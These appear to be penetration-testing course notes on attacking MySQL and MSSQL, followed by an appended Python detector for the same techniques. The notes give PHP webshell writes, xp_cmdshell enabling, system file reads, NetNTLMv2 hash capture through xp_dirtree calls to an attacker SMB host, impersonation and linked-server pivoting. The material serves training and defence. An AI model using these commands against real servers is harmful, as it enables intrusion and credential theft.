> See MySQL Footprinting notes for more details: [[5 - CPTS Notes/2 - Footprinting Module/Service Enumeration/MySQL (3306)|MySQL (3306)]]
> See MSSQL Footprinting notes for more details: [[5 - CPTS Notes/2 - Footprinting Module/Service Enumeration/MSSQL (1433)|MSSQL (1433)]]

# Introduction

- MySQL and MSSQL are relational database management systems that store data in tables, columns, and rows
- Both use SQL for querying and maintaining the databases
- MSSQL default ports: TCP/1433, UDP/1434
    - Hidden mode: TCP/2433
- MySQL default port: TCP/3306

# Authentication Mechanisms

- MSSQL supports two types:
    - **Windows authentication mode**: integrates with Windows and AD authentication methods
    - **Mixed mode**: supports authentication by Windows/AD and by SQL Server itself
- MySQL supports simple username+password auth, Windows auth with a plugin, and others
- [CVE-2012-2122](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/vulnerability/2383/mysql-database-authentication-bypass) was a vuln in `MySQL 5.6.x` servers, among others, that allowed us to bypass authentication by repeatedly using the same incorrect password for the given account, because a `timing attack` vulnerability existed in the way MySQL handled authentication attempts

## Misconfigurations

- Anonymous access
- Over-allocated privileges

# Enumeration

```bash
nmap -Pn -sV -sC -p1433 <target_ip>
```

# Access Tools

- MySQL access

```bash
mysql -u user -p<password> -h <target_ip>
```

---

- MSSQL access
    - use `sqlcmd` where only local auth is available
    ![[images/Pasted image 20251017133427.png]]
    - use `sqsh` where network auth is available
    ![[images/Pasted image 20251017133504.png]]

```cmd
sqlcmd -S <target_ip> -U user -P '<password>' -C
-- -C flag used to trust self-signed certs
```

---

```bash
sqsh -S <target_ip> -U user -P '<password>' -h              # SQL auth is assumed
sqsh -S <target_ip> -U SERVERNAME\\user -P '<password>' -h  # Windows auth
sqsh -S <target_ip> -U .\\user -P '<password>' -h           # local account Windows auth
```

---

```bash
# use this impacket tool to
# enumerate users, dbs, and linked servers
mssqlclient.py -p 1433 user@<target_ip>
```

# Default DBs

## MySQL default system schemas/databases

- `mysql` - the system database that contains tables storing information required by the MySQL server
- `information_schema` - provides access to database metadata
- `performance_schema` - a feature for monitoring MySQL Server execution at a low level
- `sys` - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema

## MSSQL default system schemas/databases

- `master` - keeps the information for an instance of SQL Server
- `msdb` - used by SQL Server Agent
- `model` - a template database copied for each new database
- `resource` - a read-only database that keeps system objects visible in every database on the server in the `sys` schema
- `tempdb` - keeps temporary objects for SQL queries

# SQL Syntax

## Using the `mysql` tool

### Simple retrieval

```bash
mysql> SHOW DATABASES;              # shows available dbs
--output--
mysql> USE db_name;
--output--
mysql> SHOW TABLES;                 # shows tables
--output--
mysql> SELECT * FROM table_name;    # shows full table
--output--
```

### Quasi command execution

- There is no native command execution, but we can achieve command execution if we write to a location in the file system that can execute our commands

```bash
mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
--output--
```

### Reading local files

- We can also try reading local files

```bash
mysql> SELECT LOAD_FILE("/etc/passwd");
--output--
```

---

## Using the `sqlcmd` tool

### Simple retrieval

```cmd
1> SELECT name FROM master.dbo.sysdatabases                      -- shows available dbs
2> GO
--output--
1> USE <db_name>
2> GO
--output--
1> SELECT table_name FROM <db_name>.INFORMATION_SCHEMA.TABLES    -- shows tables
2> GO
--output--
1> SELECT * FROM <table_name>                                    -- shows full table
2> GO
--output--
```

### Command execution & writing files

```cmd
1> xp_cmdshell 'whoami'
2> GO
--output--
```
- If `xp_cmdshell` is not enabled, we can try the following to enable it, assuming we have sufficient privileges

```cmd
-- To allow advanced options to be changed.
1> EXECUTE sp_configure 'show advanced options', 1
2> GO
-- To update the currently configured value for advanced options.
1> RECONFIGURE
2> GO
-- To enable the feature.
1> EXECUTE sp_configure 'xp_cmdshell', 1
2> GO
-- To update the currently configured value for this feature.
1> RECONFIGURE
2> GO
```

- To write files, we first need to enable `Ole Automation Procedures`

```cmd
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO
```

- Then, we can create a file

```cmd
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO
```

### Reading local files

```cmd
1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
2> GO
```

# Capturing MSSQL Service Hash

- Similar to creating a fake SMB server in [[5 - CPTS Notes/7 - Attacking Common Services/3 - SMB (139,445)#Forced Authentication Attacks|3 - SMB (139,445)]], we can also steal the MSSQL service account hash using the `xp_subdirs` or `xp_dirtree` undocumented stored procedures, which use the SMB protocol to retrieve a list of child directories under a specified parent directory from the file system
- When we use one of these stored procedures and point it to our SMB server, the directory listing functionality will force the server to authenticate and send the NetNTLMv2 hash of the service account that is running the SQL Server
- To this end, we can use `responder` or `impacket-smbserver` in tandem with some SQL queries

```bash
# XP_SUBDIRS Hash Stealing with Responder
sudo responder -I tun0
-- output with hash --

# XP_SUBDIRS Hash Stealing with impacket-smbserver
sudo impacket-smbserver share ./ -smb2support
-- output with hash --
```

```cmd
-- XP_DIRTREE Hash Stealing
1> EXEC master..xp_dirtree '\\<kali_host_ip>\share\'
2> GO
--output--

-- XP_SUBDIRS Hash Stealing
1> EXEC master..xp_subdirs '\\<kali_host_ip>\share\'
2> GO
--output--
```

# Impersonate Existing Users with MSSQL

- SQL Server has a special permission, named `IMPERSONATE`, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends
- First, let's identify users that we can impersonate
    - Sysadmins can impersonate anyone by default
    - For non-administrator users, privileges must be explicitly assigned

## Identify impersonation privs

```cmd
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO
-- shows the list of users whom the current user can impersonate
```

## Verify current user and role

```cmd
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> GO
-- shows the current user followed by 0 if the user is not a sysadmin or 1 if the user is a sysadmin
```

## Impersonate target user

```cmd
1> USE master
2> EXECUTE AS LOGIN = 'target_user'
3> SELECT SYSTEM_USER
4> SELECT IS_SRVROLEMEMBER('sysadmin')
5> GO
-- NOTE: run EXECUTE AS LOGIN within the master DB because all users have access to it, otherwise errors may occur
-- we moved to the master DB with the "USE master" command
```

# Communicate with other dbs with MSSQL

- MSSQL has a feature called linked servers
- Linked servers are typically configured to enable the database engine to execute a Transact-SQL statement that includes tables in another instance of SQL Server, or another db product such as Oracle
- Notably, if we have access to an SQL server with a linked server configured, we
may be able to move laterally

```cmd
-- identify linked servers
1> SELECT srvname, isremote FROM sysservers
2> GO
--output--

-- identify user associated with linked server
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
2> GO
--output--
```

- We can now execute queries with sysadmin privileges on the linked server
- As `sysadmin`, we control the SQL Server instance
- We can also read data from any database or execute system commands with `xp_cmdshell`
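As an added defender-side example (not part of the original notes), the following Python script runs simple detection rules over constructed SQL Server audit lines for the MSSQL techniques covered above: enabling `xp_cmdshell` or `Ole Automation Procedures` via `sp_configure`, `sp_OACreate`, `xp_dirtree`/`xp_subdirs` pointed at a UNC path, `EXECUTE AS LOGIN`, and `EXECUTE(...) AT` against a linked server. The `timestamp | login | database | statement` export format, the logins, the host `DC01` and the IP `10.10.14.5` are all assumptions I made up for the sample.

```python
import re

# Constructed sample lines in an assumed "timestamp | login | database | statement" export format.
SAMPLE_AUDIT = """\
2025-10-17T13:34:01 | webapp | master | SELECT name FROM master.dbo.sysdatabases
2025-10-17T13:34:05 | webapp | master | EXECUTE sp_configure 'show advanced options', 1
2025-10-17T13:34:06 | webapp | master | EXECUTE sp_configure 'xp_cmdshell', 1
2025-10-17T13:34:09 | webapp | master | EXEC xp_cmdshell 'whoami'
2025-10-17T13:34:20 | webapp | master | EXEC master..xp_dirtree '\\\\10.10.14.5\\share\\'
2025-10-17T13:34:31 | webapp | master | EXECUTE AS LOGIN = 'sa'
2025-10-17T13:34:40 | webapp | master | EXECUTE('select system_user') AT [DC01\\SQLEXPRESS]
2025-10-17T13:35:00 | backup_svc | msdb | EXEC master..xp_dirtree 'D:\\backups\\'
"""

# Ordered rules (finding, pattern, severity): the first match per statement wins, so the
# sp_configure rules are listed before the generic xp_cmdshell rule.
RULES = [(n, re.compile(p, re.I | re.S), s) for n, p, s in [
    ("xp_cmdshell enabled via sp_configure", r"sp_configure\s+'xp_cmdshell'\s*,\s*1", "high"),
    ("Ole Automation enabled via sp_configure", r"sp_configure\s+'Ole Automation Procedures'\s*,\s*1", "high"),
    ("advanced options exposed via sp_configure", r"sp_configure\s+'show advanced options'\s*,\s*1", "low"),
    ("OS command execution via xp_cmdshell", r"\bxp_cmdshell\b", "high"),
    ("COM object creation via sp_OACreate", r"\bsp_OACreate\b", "high"),
    ("login impersonation via EXECUTE AS LOGIN", r"\bEXECUTE\s+AS\s+LOGIN\b", "medium"),
    ("remote execution on linked server via EXECUTE ... AT", r"\bEXEC(?:UTE)?\s*\(.*\)\s+AT\s+\[", "medium"),
]]
# xp_dirtree/xp_subdirs with a UNC path; group 1 is the host the SQL Server service will authenticate to.
UNC_DIRLIST = re.compile(r"\bxp_(?:dirtree|subdirs)\b[^']*'\\\\([^\\'\s]+)", re.I)

def parse_line(line):
    # Split one audit line into its four fields; malformed lines yield None.
    parts = [p.strip() for p in line.split(" | ", 3)]
    return dict(zip(("ts", "login", "db", "stmt"), parts)) if len(parts) == 4 else None

def analyze(text):
    # Return (timestamp, login, severity, finding) for every statement that matches a rule.
    findings = []
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        unc = UNC_DIRLIST.search(rec["stmt"])
        if unc:  # local paths such as D:\backups\ do not match and are left alone
            findings.append((rec["ts"], rec["login"], "high", f"directory listing to UNC host {unc.group(1)} (forced NTLM auth)"))
            continue
        for name, pat, sev in RULES:
            if pat.search(rec["stmt"]):
                findings.append((rec["ts"], rec["login"], sev, name))
                break
    return findings
```

Feeding the sample through `analyze` yields six findings, three of them high, while the backup account's local `xp_dirtree` call is not flagged.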